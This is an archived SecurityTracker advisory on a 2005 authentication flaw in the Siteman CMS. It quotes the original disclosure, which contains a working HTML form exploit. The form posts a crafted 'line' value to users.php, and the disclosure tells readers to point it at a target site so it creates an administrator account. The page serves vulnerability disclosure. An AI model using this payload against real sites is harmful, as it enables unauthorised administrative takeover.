Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Forum/Board/Portal)  >   Siteman Vendors:
Siteman Lets Remote Users Create Administrative Accounts
SecurityTracker Alert ID:  1012951
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 20 2005
Impact:   User access via network
Exploit Included:  Yes  
Version(s): 1.1.9
Description:   amironline452 of the Alpha Hackers Digital Security Team reported an authentication vulnerability in Siteman. A remote user can gain administrative access.

A remote user can submit a specially crafted HTTP POST request to the 'users.php' script to add a user with administrative privileges. A specially crafted 'line' parameter submitted via the 'docreate' function will add a user account with level '5' privileges (i.e., administrator privileges.

A demonstration exploit value [that creates an account with a username of 'amir452' and password of 'amir452'] is of the following format:


Impact:   A remote user can create an administrative account.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Authentication error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents

Subject:  I Found a Vulnerability in ...

New CSS vulnerability in Siteman v1.1.9

Discovered By amironline452 (
By Alpha Hackers Digital Security Team

abbreviation of Siteman CMS:

Siteman is a CMS that works without MySQL DataBase and is written by the PHP.
Someone who is not that familiar and professionally with website management can manage a
website by the CMS fully.
For furthermore information contact to these addresses:


HTML Code for CSS:

<b>These data were recorded.</b><br /><br /><table cellspacing="0" cellpadding="2"><tr><td>
Username(Use this, and not your display name, when logging in)
</td><td align="right">amir452</td></tr><tr><td>Password
</td><td align="right"><form>
<select><option>Click to show password</option>
Secret Question (Asked when you forget your password)
</td><td align="right">amir452</td></tr><tr><td>Answer to secret question
</td><td align="right"><form>

<option>Click to show answer</option>
</td></tr><tr><td>Display name</td><td align="right">amir452</td></tr><tr><td>
Member Level</td><td align="right"><b>5</b> (Admin)
</td></tr><tr><td>email</td><td align="right"></td></tr>
<tr><td>Hide my email adress</td><td align="right">no
</td></tr><tr><td>Forum Signature
</td><td align="right">hackers</td></table><br /><br />Is this correct?<br />
<table cellspacing="0" cellpadding="3"><tr><td>

<form action="users.php?do=new" method="post"><input type="submit" value="no" /></form></td><td>

<form action="http://xxx/users.php?do=docreate " method="post">
     <input type="hidden" name="line" value=" amir452|347a9a8a8d3f364f0bdb82c4208a3207|5||amir452|1105956827|amir452|347a9a8a8d3f364f0bdb82c4208a3207|0|0|0|hackers" />
<input type="submit" value="yes" /></form></html>


Change xxx with your target website, then save this code with .html postfix.
then you must click on the yes button for making an account on the website with the admin (5) class.
this account user is: amir452
and the password for this account is: amir452

With special thanx to shoaliesefid7 ( the admin of the
Alpha Hackers Digital Security Team ( and the other 
members of this Team.

Have Fun 

Sent via the WebMail system at


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, LLC